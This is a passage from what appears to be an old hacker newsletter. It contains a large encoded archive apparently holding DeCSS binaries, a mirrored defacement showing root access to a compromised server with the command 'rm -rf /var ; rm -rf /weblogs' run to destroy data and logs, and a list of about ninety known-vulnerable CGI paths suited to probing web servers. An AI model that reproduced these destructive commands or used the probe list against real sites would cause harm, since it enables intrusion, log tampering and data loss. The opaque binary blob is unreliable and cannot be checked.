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
O93PmnJTYVaaKrPW1JgNptacN73miulztZjpzfMqvNWuFjXeBu9t76yXBClw
D6TCvZAOmTABECyDCjcfVbAW5vsr/HGB7yrwVJBQ6Dwf9w4ej5fgVc4pw8kI
kkEW0jV0I91K36H7ncNv0mSWxiybzIpZKXueVbAq9jqLsWZ2kB1lp9hgnsxH
8nSXNooHfAV/kdfwV/iv+G7+Ls8UD4kcMUeUilVO+duiRZwQ18TXIkmOluOd
9mlyuozKIjlf/lQuky/IKrlObpD18oD8i7qskvVMNzFr9O90p76ix5mJ5jGz
wKxyFdhmdpgzpsdcMl+a27y93ntel5fmdM5y/V/+TRK0w00Y7mf4xX69H/MT
g+EBcqofCQqCJ4PiYHHwcrAzOBJcDKx93FbZPhtfjkWdD76NZqFCVI7WoY2o
ATWhVnQS9aABlIqfwSvxWEJcLi8iB2gHfYzNYc+xc2wcn+Bydo1TmyJGiUxR
KbaLv4rPRERmyW0yfqobv57zHpyOG3AM9+EBfINFeAGP8kJexEt4KY8vcFO/
yZ87USqqxZtxnXu20bkuhuNBGs+mNtzhEjJCUkgPuUL6yQCJ0ESaQlNpOp1A
mZvebDe5BXQ2LXJ+LKVLaR/v5zf4AE8QETFMJAoECgCyIBumQg7kQQFEYTYU
QpGbmhIohcWwFMr/65Ma2AC1sBnq4DfQ4FK1CWKwB/a6bD0Ebe4N8CF0QCd0
QTf0QT/cgAE3bxF/mJ/o3+mn+Pf6e/1WP/wACAkJCQkJCfl/499QSwMEFAAC
AAgAIKCrJBMUZ68wGwAAAJAAABAAAABXbmFzcGkzMi53OTguZGxs7Dt/dJNV
lt+XfGnTkjYFGyi/nMjEI56O2BKK1BgNaAIqSGpo6g7QUiHaBmi76ffV7hxg
Ur9USZ85ui476/F4zkyoeDzD7o6zR7v1x2gg0hSojqIDLMwozoJ+GJwtIqVi
6Lf3vvel/PTM7NndvybvkLz37rvvvnvvu/e++17osh8/w+k5jhPgo6oc18+x
4uL+fAnDp/gHbxRzrxa8d0M/v/S9G1Y0Nbdb20Ktj4YaN1rXNra0tIrWhwPW
kNRibW6x3rPcZ93Yui4wp6io0KbR8Lo5bimfz/UvX1yVpXuMK75hAq+by82A
jhU+eRz3ugXqEvhUIMa2TtqGD6/N0XOFrPELJsxNG3hORwElbN54rVVtHPcs
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
Ff8iESDrAuuK6B8MIt4CxMOBQEur9GiTtb2tcW3A+khryNoYelTaGGgR2yky
4lZ/L26gpaM51NqC6IBdVNj4cEtraGPjhvG/hxQDoY3NLcBMa8v42pXzv5ee
2BQKNK6z4p/hFVF5Km9DXKkl0NkWWCsG1lk3ShvEZg1tQ+va9dZAKNQaukh7
wRX4TYHGtitxqhlO48MbAlax1draFmixrm1taW+F/rpAR/PawDju3Hnfy2tD
K6zSLN7aKGJlFZEcm1OFc9qkUMAK2hElUMcjUsta1IF1beOG/27v7IObOK4A
/uyY8uF8AWYCnpK4CVAXDN371J1kSZUt2RbIH0Eei8mExrJ1UJGzpEgnx3Yh
pQ2dTBOakqI005SQydekhH5AoK3Tob0OpdQhQNtEnZYOacChxdN0WiZtRnLD
JH17kopsoDOdTtL+sT/Nu/d2993bd3uy5nZP8ulWcG9nu8ffcSmzoL+jtTzP
7kBnMFhWQTfJdMyIDmiFWrz4oPdyf9uWGbIuevyZodmoGlBT/3Wo6ZXjZtT0
55HfRD2P+qOmXxC6iJre4a9fnRlahPpO1PQCdBvqYdQZ1CP0Wgo1vUg6iJou
0I2u/s+ueWdxU/3rppUV7r+/hmYwGIz/FThd+0l10V6MdlXR/lqZ/WW0ZxXt
h8vsr5TZO8rsR8rsr5bZO8ts+qW8mSj0A3QOOw0MBoPBYDAYDAaDwWBMob4X
YN/eFoneMzD6AQ72Xtkv0QfQFQboRUmgbEV5GGU3ykGUoyhZlDMoF1BmoX8t
Sj2KjBJAuQNlA8qnsP0+1NtRdqG8iHIIZQwli3IO5W2UKsznRpQGFC/Knf2F
XJb6Js1Pp3NmBmVTPGdGzuTM8a68+Z2xnPlcIme+MZIzE8snzYUrJs2de/Pm
t36WNy+unDSPZfPmb+bnzZx30jyCdZ99fdLcdsOk+ZInb55/P2e+O5gzbzub
N89h3atbcqYRyplfXJcz99+bM3+N/TzZlDd/hfHueylnPoNCcxmtWKul0gNa
t7UMDyBCMxqG1p42tCEPwIpi2TeoxQwsu4vlkv9N0KzHU1pbOBbRNXgTWjUj
EE4ZPrqsDcBVhsJRoyWeDEZjG3Wts2+T1m+AH7zWyrw/3hyPGcm4DiuLUVui
uuaB8xVBzbA6BDiA+elaOFVICOBV2oPv0q2KoJHE0Cl4itY3xwcGMJFANIZR
+Aqs6dGSqWg8BhAB31DU6ErG+7VUCl62vNPJJEYoHIkfj2VBZbeewq57wnpa
g3m05NGt//o3n9otSU2DGmq1lnyWVfYU7gpYbUtKpeJeb9Fe2uORtG4dWEd4
ANOCDK31NHcB5KnV6Wun9uNWRl3+2IY4zKeZB41IcVDh97SNRugeTmgwt9Aa
xp4S1N0DTZWhZLQweHBHhT8WNaJhPTqiNWNttD+sBzXrhgW04LjrmnFZ/e3g
ixlacno16BUBLTx4mTus8a3t8AUEflVE19knEIPBYDAYDAaDwfgw+dPKnZ+k
enWi8PVpep+e3k+vx7KC4kXpnYvz/rkF/33zAEJYdzfK1kTBtwJCHYXfCFiz
GjpFs0reQKA0h/xXXTCdSMSThjVXC2qxSKG2OPlkp4PBYDAYDAaDwWAwGIwP
hIni/J/O4unvpBYWn8xWXk/XBchV6ttQerGl6grPz6u6RsRtDwThLtz6YC1a
fuiEDiz7cduCNuVHVX99r7D6UFH8CXdBu0tx8DX9MXx9ldQrCAYkIQox2IjR
oqCDhpFjsAHi6OOyfAiIKKql+6zH4hGYjfXN6DMACQij/zBmE8aSZsX2QARL
CYytAf3aQQfUoH8pvhclhfW0X+oTxTix4n5B6ML+66z+k6hD1nEKwKPthQC+
KDJcWxavByWJES/F4aAB/cmULYWHObgfPT7D2ieGWeplmYfQLuVA+wRr9Gtx
nwC2b7S86VEn8Hhp9hvhM0CfQ3h5XR3sQZk6DnWYl4qvwqMam+B6jNtZ3Cda
zKV0TLGr5rSqbBz64FaM0YUx4thTGvswpp2Hfzee7daZC2PvmtU21aeUp90a
66l9TB9x/irj7bXeiT3YR/IK7y6AJdZqWTe20kxS2B6e8n6YXbWvin3CMBgM
BoPBYDAYjP8LcMK/FSfataSOLCOE2EkTWUe2ke3kMbKLPEv2kFFikqPkBMmS
N8kF8g55j8zgFnCf4JzcGi7MbeLu5bZyT3Df4/7BVfOLeJ5v5W/nH+QP86f5
cf48/zd+hnCdcLOwVOAFh7BaSAkjwrPCXmG/MCocFl4RssJZ4S2hUqwW14sR
MSluEe8XvyQ+Kn5DfF48II6KJ8Ws+I74rlgj1Uq3SMulVikgrZVC0qD0eekB
6ZfSGWmNHJeH5d3y8/KL8g/kI/LL8vvyPFut7TZbg81ta7Gtsa2zrbeN2Ezb
EdtZ24TtbdtM5WZluUIUh9KlhJQTSlY5rfxB+YuSV2ao1apT9aqD6jb1IfVR
9cdqVj2t/lFdbJftP7T/1D5mP2k/ZRccqmO7I+v4fuMvGq93fsy5wqk4m5wP
Oh9z7nI+5TzunOFa6FrqElwbXPe7drqecx11jbsmXB9xV7sXupe5G90ed5v7
Lvce9wm6uFEHMIaqktxAFpClpJH4yXpyNzHI58jj5BA5Rl4j4+QijvmN3E3c
LdwyTsSRH+DS3BYuw73CTeC4A/80/wJ/hD/Jn+LP8ItxXFeKgniPOIxj+ZD4
iHgcx/B34rh4nbRK6pQ2Szukr0sHpDHppJSVquW58iL543K/nJQfkA/Jh+XX
5FPyG/K3cbyO2uYoNcqtSr0iK5uUe5QvKBnlCeW7ys+VCeWCMlNdpO5Wn1b3
q8fU11X6xCS60rOEtJEdJEOO27P20/Zz9j/b/26/aK9yXOuocXzUscTR4BAd
jQ7dsRlHkP3xMRgMBoPBYDAYDMaHxz8BUEsBAhQAFAACAAgAe4tMJwsWduNp
AgAAGgYAAAoAAAAAAAAAAQAgALaBAAAAAHJlYWRtZS50eHRQSwECFAAUAAIA
CAC6jUwntRjr0dtuAAAAdgAACQAAAAAAAAAAACAA/4GRAgAARGVDU1MuZXhl
UEsBAhQAFAACAAgAUZlCJtHnMODoVQAAAOAAABAAAAAAAAAAAAAgALaBk3EA
AHduYXNwaTMyLncyay5kbGxQSwECFAAUAAIACAAgoKskExRnrzAbAAAAkAAA
EAAAAAAAAAAAACAAtoGpxwAAV25hc3BpMzIudzk4LmRsbFBLBQYAAAAABAAE
AOsAAAAH4wAAAAA= ====
------------------------ END ------------------------------
BlaznWeed's recent hack:
http://www.attrition.org/mirror/attrition/2000/04/10/web1.carsacrossamerica.com/mirror.html
bash# uname -a ; w ;id
Linux web1.carsacrossamerica.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
10:52pm up 11 days, 8:56, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 30Mar 0 11days 0.06s 0.02s -bash
cars pts/0 216.3.51.40 3:33pm 7:08m 0.05s 0.05s -bash
uid=0(root) gid=505(davem) groups=505(davem)
bash#rm -rf /var ; rm -rf /weblogs
sorry but i'm lazy :P
/*********************************************************************/
This mpaa issue has gone on long enough. We as a global community cannot afford to let america
control every aspect of our live. This isn't just about copying DVD's this is about retaining our rights
to intellectual freedoms which the government of america will gladly allow the mpaa violate. If I purchase
a dvd player I should have the right to do and/or view whatever I want on my private property. There
should NO territorial lockout or encryption to stop me from using *my* property to its fullest.
The retarded excuse for territorial lockout given by the movie industry is that they are able to release
movies in countries at a time that would maximize there profits. The truth is however rather different
the reason territorial lockout exists on players is, so they can brainwash harry homeowner with there
own doctrine and minimize the possibility of foreign governments releasing materials which can be viewed
by harry homeowner that would change his/her mind about certain political issues.
I fully support 2600's stance against corparate bullies , if mpaa thinks they can wipeout decss by taking 2600
offline they got another thing coming.
dowload css-auth below for the source code to decss (unix only)
css-auth.tar
download decss.zip below if your a windowz kid
decss.zip
-BlazinWeed
Shouts: everyone in wkD and everyone else thats down with me you know who you be
Fucks: mpaa (isn't that a suprise ?) , Freemasons and all you other bitches that sliped my mind
Attrition lamer of the week: Mcm4nus .. this kiddies is responsible for a truck load of hacks that say jack shit
"hacked by Mcm4nus " oh fuckin *pheer*.
kiddies please if your going to deface something then at least fuckin say something.
the decss link above obviously won't work when the admin removes the file so I also
enclose the uuencode of the zip and tarball if you don't know how to decode these you suck.
[snip]
<censored by Attrition, see previous hack for full UUcode source - HWA>
@HWA
05.0 b0f:Common WWW and CGI vulnerabilities list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/cgi-bin/whois_raw.cgi
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/php-cgi
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdispaly.cgi
/cgi-bin/perl.exe
/cgi-bin/bigconf.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/htsearch
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/get32.exe
/cgi-bin/man.sh
/cgi-bin/meta.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/maillist.cgi
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger?@localhost
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/classified.cgi
/cgi-bin/environ.cgi
/cgi-bin/fpexplore.exe
/cgi-bin/imagemap.exe
/cgi-bin/cgitest.exe
/cgi-bin/anyboard.cgi
/cgi-bin/webbbs.cgi
/cgi-bin/visadmin.exe
/cgi-bin/nph-publish
/cgi-bin/perlshop.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/cachemgr.cgi
/cgi-bin/query
/cgi-bin/rpm_query
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/architext_query.pl
/cgi-bin/w3-msql/
/cgi-bin/add_ftp.cgi
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/whois.cgi
/cgi-bin/mlog.phtml
/cgi-bin/archie
/cgi-bin/bb-hist.sh
/cgi-bin/nph-error.pl
/cgi-bin/post_query
/cgi-bin/ppdscgi.exe
/cgi-bin/webmap.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/webutils.pl
/cgi-bin/axs.cgi
/cgi-bin/responder.cgi
/cgi-bin/plusmail
/cgi-bin/passwd.txt
/cgi-bin/Cgitest.exe
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/webwho.pl
/cgi-bin/search.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/search/tidfinder.cgi
/cgi-bin/wa
/cgi-bin/tablebuild.pl
/cgi-bin/displayTC.pl
/cgi-bin/uptime
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/c_download.cgi
/cgi-bin/download.cgi
